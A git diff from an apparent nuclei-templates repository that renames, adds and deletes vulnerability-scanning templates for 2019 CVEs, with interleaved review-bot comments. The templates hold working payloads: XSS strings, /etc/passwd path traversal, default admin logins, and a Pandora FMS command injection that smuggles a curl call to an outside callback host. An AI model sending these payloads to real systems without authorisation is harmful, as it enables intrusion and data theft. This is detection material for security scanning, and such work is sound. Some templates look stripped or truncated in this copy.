rename to nuclei-templates/CVE-2019/CVE-2019-15889.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-16278.yaml b/nuclei-templates/CVE-2019/CVE-2019-16278.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-16278.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-16278.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-16313.yaml b/nuclei-templates/CVE-2019/CVE-2019-16313.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-16313.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-16313.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-16332.yaml b/nuclei-templates/CVE-2019/CVE-2019-16332.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-16332.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-16332.yaml
diff --git a/nuclei-templates/CVE-2020/cve-2020-16920.yaml b/nuclei-templates/CVE-2019/CVE-2019-16920.yaml
similarity index 100%
rename from nuclei-templates/CVE-2020/cve-2020-16920.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-16920.yaml
diff --git a/nuclei-templates/CVE-2019/CVE-2019-16931.yaml b/nuclei-templates/CVE-2019/CVE-2019-16931.yaml
deleted file mode 100644
index 7cccc93c52..0000000000
--- a/nuclei-templates/CVE-2019/CVE-2019-16931.yaml
+++ /dev/null
@@ -1,41 +0,0 @@ -id: CVE-2019-16931 -info: - name: Visualizer < 3.3.1 - Stored Cross-Site Scripting (XSS) - author: ritikchaddha - severity: medium - description: | - By abusing a lack of access controls on the /wp-json/visualizer/v1/update-chart WP-JSON API endpoint, an attacker can arbitrarily modify meta data of an existing chart, and inject a XSS payload to be stored and later executed when an admin goes to edit the chart. - reference: - - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44 - - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf - - https://nvd.nist.gov/vuln/detail/CVE-2019-16931 - - https://wpvulndb.com/vulnerabilities/9893 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-16931 - cwe-id: CWE-79 - metadata: - verified: "true" - tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth -requests: - - raw: - - | - POST /wp-json/visualizer/v1/update-chart HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json - - {"id": 7, "visualizer-chart-type": ""} - matchers-condition: and - matchers: - - type: word - part: body - words: - - '{"success":"Chart updated"}' - - type: word - part: header - words: - - 'application/json' - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/cve-2019-17270.yaml b/nuclei-templates/CVE-2019/CVE-2019-17270.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-17270.yaml rename to nuclei-templates/CVE-2019/CVE-2019-17270.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-17444.yaml b/nuclei-templates/CVE-2019/CVE-2019-17444.yaml deleted file mode 100644 index e02dbd7ffb..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-17444.yaml +++ /dev/null 
@@ -1,42 +0,0 @@ -id: CVE-2019-17444 - -info: - author: pdteam - name: Jfrog Artifactory default password - severity: critical - description: | - Jfrog Artifactory uses default passwords (such as "password") for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. This issue affects Jfrog Artifactory versions prior to 6.17.0. - reference: - - https://www.jfrog.com/confluence/display/JFROG/Artifactory+Release+Notes - - https://www.jfrog.com/confluence/display/JFROG/JFrog+Artifactory - - https://nvd.nist.gov/vuln/detail/CVE-2019-17444 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H - cvss-score: 9.80 - cve-id: CVE-2019-17444 - cwe-id: CWE-521 - tags: cve,cve2019,jfrog,default-login - -requests: - - raw: - - | - POST /ui/api/v1/ui/auth/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json;charset=UTF-8 - X-Requested-With: XMLHttpRequest - Origin: {{RootURL}} - - {"user":"admin","password":"password","type":"login"} - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"name":"admin"' - - '"admin":true' - condition: and \ No newline at end of file diff --git a/nuclei-templates/CVE-2019/cve-2019-18922.yaml b/nuclei-templates/CVE-2019/CVE-2019-18922.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-18922.yaml rename to nuclei-templates/CVE-2019/CVE-2019-18922.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-19368.yaml b/nuclei-templates/CVE-2019/CVE-2019-19368.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-19368.yaml rename to nuclei-templates/CVE-2019/CVE-2019-19368.yaml 
diff --git a/nuclei-templates/CVE-2019/cve-2019-19824.yaml b/nuclei-templates/CVE-2019/CVE-2019-19824.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-19824.yaml rename to nuclei-templates/CVE-2019/CVE-2019-19824.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-20210.yaml b/nuclei-templates/CVE-2019/CVE-2019-20210.yaml deleted file mode 100644 index 43994e7cf1..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-20210.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2019-20210 -info: - name: CTHthemes CityBook < 2.3.4 - Reflected XSS - author: edoardottt - severity: medium - description: | - The CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes for WordPress allow Reflected XSS via a search query. - reference: - - https://wpscan.com/vulnerability/10013 - - https://nvd.nist.gov/vuln/detail/CVE-2019-20210 - - https://wpvulndb.com/vulnerabilities/10018 - - https://cxsecurity.com/issue/WLB-2019120112 - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N - cvss-score: 6.1 - cve-id: CVE-2019-20210 - cwe-id: CWE-79 - tags: cve,cve2019,wordpress,citybook,xss,wp-theme -requests: - - method: GET - path: - - "{{BaseURL}}/?search_term=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&location_search=&nearby=off&address_lat=&address_lng=&distance=10&lcats%5B%5D=" - matchers-condition: and - matchers: - - type: word - part: body - words: - - "" - - "/wp-content/themes/citybook" - condition: and - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/CVE-2019/CVE-2019-20224.yaml b/nuclei-templates/CVE-2019/CVE-2019-20224.yaml new file mode 100644 index 0000000000..b7a2d0559b --- /dev/null +++ b/nuclei-templates/CVE-2019/CVE-2019-20224.yaml 
@@ -0,0 +1,48 @@
+id: CVE-2019-20224
+info:
+ name: Pandora FMS 7.0NG - Remote Command Injection
+ author: ritikchaddha
+ severity: high
+ description: |
+ Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
+ reference:
+ - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
+ - https://gist.github.com/mhaskar/2153d66a0928492d76b799ba13b9e3f9
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-20224
+ - https://drive.google.com/file/d/1DkWR5MylzeNr20jmHXTaAIJmf3YN-lnO/view
+ remediation: This issue has been fixed in Pandora FMS 7.0 NG 742.
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2019-20224
+ cwe-id: CWE-78
+ tags: pandorafms,rce,cve,cve2019,authenticated,oast
+requests:
+ - raw:
+ - |
+ POST /pandora_console/index.php?login=1 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ nick=admin&pass=admin&login_button=Login
+ - |
+ POST /pandora_console/index.php?sec=netf&sec2=operation/netflow/nf_live_view&pure=0 HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: application/x-www-form-urlencoded
+
+ date=0&time=0&period=0&interval_length=0&chart_type=netflow_area&max_aggregates=1&address_resolution=0&name=0&assign_group=0&filter_type=0&filter_id=0&filter_selected=0&ip_dst=0&ip_src=%22%3Bcurl+{{interactsh-url}}+%23&draw_button=Draw
+ cookie-reuse: true
+ redirects: true
+ max-redirects: 2
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol
+ name: http
+ words:
+ - "http"
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/06/17
diff --git a/nuclei-templates/CVE-2019/CVE-2019-20354.yaml b/nuclei-templates/CVE-2019/CVE-2019-20354.yaml
deleted file mode 100644
index ac3941c763..0000000000
--- a/nuclei-templates/CVE-2019/CVE-2019-20354.yaml
+++ /dev/null
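Review bot: The login request hard-codes `nick=admin&pass=admin`, so the template only confirms the injection on installs that still use the default account and reports nothing on a patched-password host that is otherwise vulnerable; the DomainMOD template removed elsewhere in this diff takes credentials as `{{username}}`/`{{password}}`, which is the convention to follow here. The description should also state that a match implies default administrative credentials, since that is a separate finding from CVE-2019-20224 and the operator will want to report both.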
@@ -1,18 +0,0 @@ -id: CVE-2019-20354 -info: - author: "pikpikcu" - name: "piSignage 2.6.4 Directory Traversal" - severity: High - #Source:-https://github.com/colloqi/piSignage/issues/97 -requests: - - raw: - - "GET /api/settings/log?file=../../../../../../../../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 277\nConnection: close\nReferer: {{Hostname}}\n \n" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: regex - part: body - regex: - - "root:[x*]:0:0:" diff --git a/nuclei-templates/CVE-2019/CVE-2019-2616.yaml b/nuclei-templates/CVE-2019/CVE-2019-2616.yaml deleted file mode 100644 index f6c8aa1ffb..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-2616.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2019-2616 -info: - name: XXE in Oracle Business Intelligence and XML Publisher - author: pdteam - severity: high - description: Oracle Business Intelligence / XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 - XML External Entity Injection - reference: - - https://nvd.nist.gov/vuln/detail/CVE-2019-2616 - - https://www.exploit-db.com/exploits/46729 - - http://www.oracle.com/technetwork/security-advisory/cpuapr2019-5072813.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N - cvss-score: 7.2 - cve-id: CVE-2019-2616 - tags: cve,cve2019,oracle,xxe,oast,kev -requests: - - raw: - - | - POST /xmlpserver/ReportTemplateService.xls HTTP/1.1 - Host: {{Hostname}} - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Content-Type: text/xml; charset=UTF-8 - - - matchers: - - type: word - part: interactsh_protocol # Confirms the HTTP Interaction - words: - - "http" 
diff --git a/nuclei-templates/CVE-2019/cve-2019-3396.yaml b/nuclei-templates/CVE-2019/CVE-2019-3396.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-3396.yaml rename to nuclei-templates/CVE-2019/CVE-2019-3396.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-3929.yaml b/nuclei-templates/CVE-2019/CVE-2019-3929.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-3929.yaml rename to nuclei-templates/CVE-2019/CVE-2019-3929.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-6112.yaml b/nuclei-templates/CVE-2019/CVE-2019-6112.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-6112.yaml rename to nuclei-templates/CVE-2019/CVE-2019-6112.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-7315.yaml b/nuclei-templates/CVE-2019/CVE-2019-7315.yaml deleted file mode 100644 index 7e2cb32f90..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-7315.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: CVE-2019-7315 -info: - name: Genie Access WIP3BVAF IP Camera - Directory Traversal - author: 0x_Akoko - severity: high - description: Genie Access WIP3BVAF WISH IP 3MP IR Auto Focus Bullet Camera devices through 3.X are vulnerable to directory traversal via the web interface, as demonstrated by reading /etc/shadow. - reference: - - https://labs.nettitude.com/blog/cve-2019-7315-genie-access-wip3bvaf-ip-camera-directory-traversal/ - - https://vuldb.com/?id.136593 - - https://www.cvedetails.com/cve/CVE-2019-7315 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-7315 - cwe-id: CWE-22 - tags: cve,cve2019,camera,genie,lfi,iot -requests: - - method: GET - path: - - "{{BaseURL}}/../../../../../etc/passwd" - matchers-condition: and - matchers: - - type: regex - part: body - regex: - - "root:.*:0:0:" - - type: status - status: - - 200 
diff --git a/nuclei-templates/CVE-2019/cve-2019-7481.yaml b/nuclei-templates/CVE-2019/CVE-2019-7481.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-7481.yaml rename to nuclei-templates/CVE-2019/CVE-2019-7481.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-8442.yaml b/nuclei-templates/CVE-2019/CVE-2019-8442.yaml deleted file mode 100644 index 5079f927ff..0000000000 --- a/nuclei-templates/CVE-2019/CVE-2019-8442.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: CVE-2019-8442 -info: - name: JIRA Directory Traversal - author: Kishore Krishna (siLLyDaddy) - severity: high - description: The CachingResourceDownloadRewriteRule class in Jira before version 7.13.4, and from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 allows remote attackers to access files in the Jira webroot under the META-INF directory via a lax path access check. - reference: - - https://jira.atlassian.com/browse/JRASERVER-69241 - - http://web.archive.org/web/20210125215006/https://www.securityfocus.com/bid/108460/ - classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N - cvss-score: 7.5 - cve-id: CVE-2019-8442 - tags: cve,cve2019,atlassian,jira,lfi -requests: - - method: GET - path: - - "{{BaseURL}}/s/{{randstr}}/_/WEB-INF/classes/META-INF/maven/com.atlassian.jira/jira-core/pom.xml" - - "{{BaseURL}}/s/{{randstr}}/_/META-INF/maven/com.atlassian.jira/atlassian-jira-webapp/pom.xml" - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'com.atlassian.jira' - part: body diff --git a/nuclei-templates/CVE-2019/cve-2019-8903.yaml b/nuclei-templates/CVE-2019/CVE-2019-8903.yaml similarity index 100% rename from nuclei-templates/CVE-2019/cve-2019-8903.yaml rename to nuclei-templates/CVE-2019/CVE-2019-8903.yaml 
diff --git a/nuclei-templates/CVE-2019/cve-2019-8982.yaml b/nuclei-templates/CVE-2019/CVE-2019-8982.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-8982.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-8982.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-9618.yaml b/nuclei-templates/CVE-2019/CVE-2019-9618.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-9618.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-9618.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-9726.yaml b/nuclei-templates/CVE-2019/CVE-2019-9726.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/cve-2019-9726.yaml
rename to nuclei-templates/CVE-2019/CVE-2019-9726.yaml
diff --git a/nuclei-templates/CVE-2019/CVE-2019-10092.yaml b/nuclei-templates/CVE-2019/cve-2019-10092.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/CVE-2019-10092.yaml
rename to nuclei-templates/CVE-2019/cve-2019-10092.yaml
diff --git a/nuclei-templates/CVE-2019/CVE-2019-10232.yaml b/nuclei-templates/CVE-2019/cve-2019-10232.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/CVE-2019-10232.yaml
rename to nuclei-templates/CVE-2019/cve-2019-10232.yaml
diff --git a/nuclei-templates/CVE-2019/CVE-2019-10405.yaml b/nuclei-templates/CVE-2019/cve-2019-10405.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/CVE-2019-10405.yaml
rename to nuclei-templates/CVE-2019/cve-2019-10405.yaml
diff --git a/nuclei-templates/CVE-2019/CVE-2019-10475.yaml b/nuclei-templates/CVE-2019/cve-2019-10475.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/CVE-2019-10475.yaml
rename to nuclei-templates/CVE-2019/cve-2019-10475.yaml
diff --git a/nuclei-templates/CVE-2019/CVE-2019-11043.yaml b/nuclei-templates/CVE-2019/cve-2019-11043.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/CVE-2019-11043.yaml
rename to nuclei-templates/CVE-2019/cve-2019-11043.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-11370.yaml b/nuclei-templates/CVE-2019/cve-2019-11370.yaml deleted file mode 100644 index c2f5e3f80f..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-11370.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: CVE-2019-11370 - -info: - name: Carel pCOWeb \">') - condition: and - -# Enhanced by mp on 2022/08/08 diff --git a/nuclei-templates/CVE-2019/CVE-2019-11510.yaml b/nuclei-templates/CVE-2019/cve-2019-11510.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-11510.yaml rename to nuclei-templates/CVE-2019/cve-2019-11510.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-11580.yaml b/nuclei-templates/CVE-2019/cve-2019-11580.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-11580.yaml rename to nuclei-templates/CVE-2019/cve-2019-11580.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-12314.yaml b/nuclei-templates/CVE-2019/cve-2019-12314.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-12314.yaml rename to nuclei-templates/CVE-2019/cve-2019-12314.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-12581.yaml b/nuclei-templates/CVE-2019/cve-2019-12581.yaml new file mode 100644 index 0000000000..ed07cdfb22 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-12581.yaml 
@@ -0,0 +1,45 @@
+id: CVE-2019-12581
+
+info:
+ name: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting
+ author: n-thumann
+ severity: medium
+ description: Zyxel ZyWall, USG, and UAG devices allow remote attackers to inject arbitrary web script or HTML via the err_msg parameter free_time_failed.cgi CGI program, aka reflective cross-site scripting.
+ reference:
+ - https://www.zyxel.com/support/vulnerabilities-related-to-the-Free-Time-feature.shtml
+ - https://sec-consult.com/vulnerability-lab/advisory/reflected-cross-site-scripting-in-zxel-zywall/
+ - https://n-thumann.de/blog/zyxel-gateways-missing-access-control-in-account-generator-xss/
+ - https://nvd.nist.gov/vuln/detail/CVE-2019-12581
+ classification:
+ cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2019-12581
+ cwe-id: CWE-79
+ metadata:
+ shodan-query: http.title:"ZyWall"
+ tags: cve,cve2019,zyxel,zywall,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/free_time_failed.cgi?err_msg="
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - ""
+ - "Please contact with administrator."
+ condition: and
+
+ - type: word
+ part: header
+ words:
+ - "text/html"
+
+ - type: status
+ status:
+ - 200
+
+# Enhanced by mp on 2022/08/10
diff --git a/nuclei-templates/CVE-2019/CVE-2019-12616.yaml b/nuclei-templates/CVE-2019/cve-2019-12616.yaml
similarity index 100%
rename from nuclei-templates/CVE-2019/CVE-2019-12616.yaml
rename to nuclei-templates/CVE-2019/cve-2019-12616.yaml
diff --git a/nuclei-templates/CVE-2019/cve-2019-12962.yaml b/nuclei-templates/CVE-2019/cve-2019-12962.yaml
new file mode 100644
index 0000000000..13749b9d0e
--- /dev/null
+++ b/nuclei-templates/CVE-2019/cve-2019-12962.yaml
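Review bot: `name: Zyxel ZyWal/USG/UAG Devices - Cross-Site Scripting` misspells the product; the description line below it has the right form, so this should read `name: Zyxel ZyWall/USG/UAG Devices - Cross-Site Scripting`. As rendered here the first body word is the empty string `""` and the path ends at `err_msg=` with no value, which looks like markup stripped from both lines; confirm the committed file still carries the reflected marker in both places, because an empty word matches every body and turns the `condition: and` into a check for the static "Please contact with administrator." text alone. This file is a case-only re-add of the `CVE-2019-12581.yaml` deleted earlier in the diff with near-identical content; a rename would keep the file's history instead of a delete plus add.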
@@ -0,0 +1,49 @@ +id: CVE-2019-12962 + +info: + name: LiveZilla Server 8.0.1.0 - Cross-Site Scripting + author: Clment Cruchet + severity: medium + description: | + LiveZilla Server 8.0.1.0 is vulnerable to reflected cross-site scripting. + reference: + - https://www.exploit-db.com/exploits/49669 + - https://forums.livezilla.net/index.php?/topic/10984-fg-vd-19-083085087-livezilla-server-are-vulnerable-to-cross-site-scripting-in-admin-panel/ + - http://packetstormsecurity.com/files/161867/LiveZilla-Server-8.0.1.0-Cross-Site-Scripting.html + - https://nvd.nist.gov/vuln/detail/CVE-2019-12962 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-12962 + cwe-id: CWE-79 + metadata: + shodan-query: http.html:LiveZilla + verified: true + tags: xss,edb,packetstorm,cve,cve2019,livezilla + + +requests: + - method: GET + path: + - '{{BaseURL}}/mobile/index.php' + + headers: + Accept-Language: ';alert(document.domain)//' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "var detectedLanguage = ';alert(document.domain)//';" + + - type: word + part: header + words: + - "text/html" + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/08 diff --git a/nuclei-templates/CVE-2019/cve-2019-13396.yaml b/nuclei-templates/CVE-2019/cve-2019-13396.yaml deleted file mode 100644 index c6ef0512e4..0000000000 --- a/nuclei-templates/CVE-2019/cve-2019-13396.yaml +++ /dev/null 
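Review bot: `verified: true` is a YAML boolean here while the CVE-2019-15811 and CVE-2019-16931 templates in this same commit write `verified: "true"` as a string; nuclei accepts both, but tooling that filters on the metadata value will treat them differently, so one form should be used across the batch. The `author` value `Clment Cruchet` looks like it lost a non-ASCII character in transit (presumably `Clément`); worth checking the committed bytes. The `description` only repeats the `name`; one sentence stating that the `Accept-Language` header is reflected into the `detectedLanguage` script variable, which is exactly what the matcher looks for, would make the matcher's intent clear to the next maintainer.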
@@ -1,51 +0,0 @@ -id: CVE-2019-13396 - -info: - name: FlightPath Local File Inclusion - author: 0x_Akoko,daffainfo - severity: medium - description: FlightPath versions prior to 4.8.2 and 5.0-rc2 suffer from a local file inclusion vulnerability. - reference: - - https://www.exploit-db.com/exploits/47121 - - https://www.cvedetails.com/cve/CVE-2019-13396/ - - https://nvd.nist.gov/vuln/detail/CVE-2019-13396 - - http://getflightpath.com/node/2650 - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cve-id: CVE-2019-13396 - cwe-id: CWE-22 - tags: cve,cve2019,flightpath,lfi - -requests: - - raw: - - | - GET /login HTTP/1.1 - Host: {{Hostname}} - - - | - POST /flightpath/index.php?q=system-handle-form-submit HTTP/1.1 - Host: {{Hostname}} - Accept: application/json, text/plain, */* - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - - callback=system_login_form&form_token={{token}}&form_include=../../../../../../../../../etc/passwd - - matchers-condition: and - matchers: - - type: regex - regex: - - "root:.*:0:0:" - - - type: status - status: - - 200 - - extractors: - - type: regex - name: token - part: body - group: 1 - internal: true - regex: - - "idden' name='form_token' value='([a-z0-9]+)'>" diff --git a/nuclei-templates/CVE-2019/CVE-2019-14322.yaml b/nuclei-templates/CVE-2019/cve-2019-14322.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-14322.yaml rename to nuclei-templates/CVE-2019/cve-2019-14322.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-14470.yaml b/nuclei-templates/CVE-2019/cve-2019-14470.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-14470.yaml rename to nuclei-templates/CVE-2019/cve-2019-14470.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-15811.yaml b/nuclei-templates/CVE-2019/cve-2019-15811.yaml new file mode 100644 index 0000000000..e518b68a14 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-15811.yaml 
@@ -0,0 +1,49 @@ +id: CVE-2019-15811 + +info: + name: DomainMOD <=4.13.0 - Cross-Site Scripting + author: arafatansari + severity: medium + description: | + DomainMOD through 4.13.0 contains a cross-site scripting vulnerability via /reporting/domains/cost-by-month.php in Daterange parameters. + reference: + - https://www.exploit-db.com/exploits/47325 + - https://github.com/domainmod/domainmod/issues/108 + - https://nvd.nist.gov/vuln/detail/CVE-2019-15811 + - https://zerodays.lol/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-15811 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2019,domainmod,xss,authenticated,edb + +requests: + - raw: + - | + POST / HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + new_username={{username}}&new_password={{password}} + + - | + GET /reporting/domains/cost-by-month.php?daterange=%22onfocus=%22alert(document.domain)%22autofocus=%22 HTTP/1.1 + Host: {{Hostname}} + + cookie-reuse: true + host-redirects: true + max-redirects: 2 + req-condition: true + matchers: + - type: dsl + dsl: + - 'status_code_2 == 200' + - 'contains(all_headers_2, "text/html")' + - 'contains(body_2, "value=\"\"onfocus=\"alert(document.domain)\"autofocus=")' + - 'contains(body_2, "DomainMOD")' + condition: and + +# Enhanced by mp on 2022/08/31 diff --git a/nuclei-templates/CVE-2019/CVE-2019-15859.yaml b/nuclei-templates/CVE-2019/cve-2019-15859.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-15859.yaml rename to nuclei-templates/CVE-2019/cve-2019-15859.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16097.yaml b/nuclei-templates/CVE-2019/cve-2019-16097.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16097.yaml rename to nuclei-templates/CVE-2019/cve-2019-16097.yaml 
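Review bot: The first raw request substitutes `{{username}}` and `{{password}}`, but nothing in `info` says these variables must be supplied at run time; without them the login POST sends the literal placeholders, the second request never reaches the authenticated page, and the template silently never matches. Add a sentence to the description such as `Requires valid DomainMOD credentials passed as the username and password template variables.` next to the existing `authenticated` tag. The `host-redirects: true` / `max-redirects: 2` pair is also undocumented; a short comment noting that the login response redirects before the report page is reached would explain why they are needed.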
diff --git a/nuclei-templates/CVE-2019/CVE-2019-16123.yaml b/nuclei-templates/CVE-2019/cve-2019-16123.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16123.yaml rename to nuclei-templates/CVE-2019/cve-2019-16123.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16525.yaml b/nuclei-templates/CVE-2019/cve-2019-16525.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16525.yaml rename to nuclei-templates/CVE-2019/cve-2019-16525.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-1653.yaml b/nuclei-templates/CVE-2019/cve-2019-1653.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-1653.yaml rename to nuclei-templates/CVE-2019/cve-2019-1653.yaml diff --git a/nuclei-templates/CVE-2019/CVE-2019-16759.yaml b/nuclei-templates/CVE-2019/cve-2019-16759.yaml similarity index 100% rename from nuclei-templates/CVE-2019/CVE-2019-16759.yaml rename to nuclei-templates/CVE-2019/cve-2019-16759.yaml diff --git a/nuclei-templates/CVE-2019/cve-2019-16931.yaml b/nuclei-templates/CVE-2019/cve-2019-16931.yaml new file mode 100644 index 0000000000..870a85d2d8 --- /dev/null +++ b/nuclei-templates/CVE-2019/cve-2019-16931.yaml 
@@ -0,0 +1,48 @@ +id: CVE-2019-16931 + +info: + name: WordPress Visualizer <3.3.1 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + WordPress Visualizer plugin before 3.3.1 contains a stored cross-site scripting vulnerability via /wp-json/visualizer/v1/update-chart WP-JSON API endpoint. An unauthenticated attacker can execute arbitrary JavaScript when an admin or other privileged user edits the chart via the admin dashboard. + reference: + - https://wpscan.com/vulnerability/867e000d-d2f5-4d53-89b0-41d7d4163f44 + - https://nathandavison.com/blog/wordpress-visualizer-plugin-xss-and-ssrf + - https://wpvulndb.com/vulnerabilities/9893 + - https://nvd.nist.gov/vuln/detail/CVE-2019-16931 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N + cvss-score: 6.1 + cve-id: CVE-2019-16931 + cwe-id: CWE-79 + metadata: + verified: "true" + tags: cve,cve2019,wp-plugin,wordpress,wp,xss,unauth,wpscan + +requests: + - raw: + - | + POST /wp-json/visualizer/v1/update-chart HTTP/1.1 + Host: 